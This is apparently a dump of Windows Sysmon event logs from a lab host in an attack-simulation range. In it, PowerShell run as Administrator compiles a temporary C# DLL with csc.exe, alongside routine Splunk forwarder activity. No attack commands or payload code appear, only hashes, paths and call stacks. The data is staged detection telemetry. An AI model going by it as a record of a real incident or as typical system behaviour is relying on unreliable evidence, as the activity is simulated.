Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=35E377A46E04E97E096CE5CE94748F8B,SHA256=DB7E3F76F7F2922591B13BFB7DDE0CA4F130721258DEE42E792EEDCDBC4CDA8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:39.263{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61518-false10.0.1.12-8089- 354300x800000000000000024694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:42.232{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61519-false10.0.1.12-8000- 23542300x800000000000000024693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:43.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DC692454468B53535CDE6997D81730,SHA256=8D5BFEFEEA1C096361615218EB3E77AEF73100F09D0489BDC0F962CF08BC96E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:44.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C60F0F7BB037B02E177DF50AE9C9D28,SHA256=8414ED85D437331B64FC7C67E09109AD0D7EB7DD208BA3EFB466A419106868F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:45.490{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FFE4E83F9A896E37589100F5C4CF0B2,SHA256=2015EE45EB6B01E3F0D16CFFB84491B0DDF1EC33F105B6F672A7EF5982193F4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:46.521{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AA2326DB856EC35E0B294FBFBC46E9,SHA256=F813FC89259BF50A20FC89BEC5DF9E9C65E5D63C599CC29FA43D780F5C07B96F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:47.552{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D431512ABFBCA968A85AD0E4B7A318AD,SHA256=8EA69884FA8778734D86E34460D8A944D8F3E0D6B247D62B4637838143D8A95F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.802{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=331F3060041DD33717D2EE8DDE1D126B,SHA256=D5DF11349D52B5D18D0B9C65F7E5D326210CA58DF472042EA6F9F4C110E821A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.802{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90385A998E9EC7F7962A61573B4AE618,SHA256=9DB4BF769EF77B503C9D6E6C9FC4C461F6C9B126AC7D47B5E3D422E7B23E0569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdlineMD5=15400A20582AF3D33E875FD3E37B0C09,SHA256=7C9D0E01294AD3E22C350F6B50745A389ABE789A9931E3F2E2A0FCDCEDAFDC94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.0.csMD5=10E9ABF0FAE68083CD0F74B09AFF5337,SHA256=D5A895B2362348B06CF4EEC1C6C912F9BA19E882023309237AA479EDC6E9834E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dllMD5=37C3055ADBEA32350315F1B5B49E18A9,SHA256=B80C1F71AFAB183EBCB99B7FA1EAB467F04A9AB4309EBAF345118AD125167F56,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.outMD5=12107309D183C6F73A24249AE41FB78A,SHA256=83BA32E34FDBCFC2B92B5FBA4EEC3E2D2A5A807E67E1833A724E7EFA6B07B7E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\CSC96C2CDA38C574F06AECFADFACA9F7F46.TMPMD5=3B74CA40B3960D4C59FD542A930932AF,SHA256=FCA316E4A528ECE5C4E1DF65F798EA27704C14F253A215D4BA041C8981B3C2DF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dll2021-06-23 21:09:48.617 23542300x800000000000000024735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES975C.tmpMD5=368C66C68E9A9A73854413DBD91C3B0A,SHA256=A4CF58E41DA09BF34DD6C7FC1EB7E302BD6A89B0D3CE09E977E6AB6B036665B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-A31C-60D3-2806-00000000CF01}1288ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES975C.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.693{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.693{4DB9351A-A31C-60D3-2706-00000000CF01}65005352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.708{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES975C.tmp" "c:\Users\Administrator\AppData\Local\Temp\qal2myyi\CSC96C2CDA38C574F06AECFADFACA9F7F46.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdline" 10341000x800000000000000024724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.630{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d8e81|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d828a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bed14bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64) 154100x800000000000000024717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.628{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 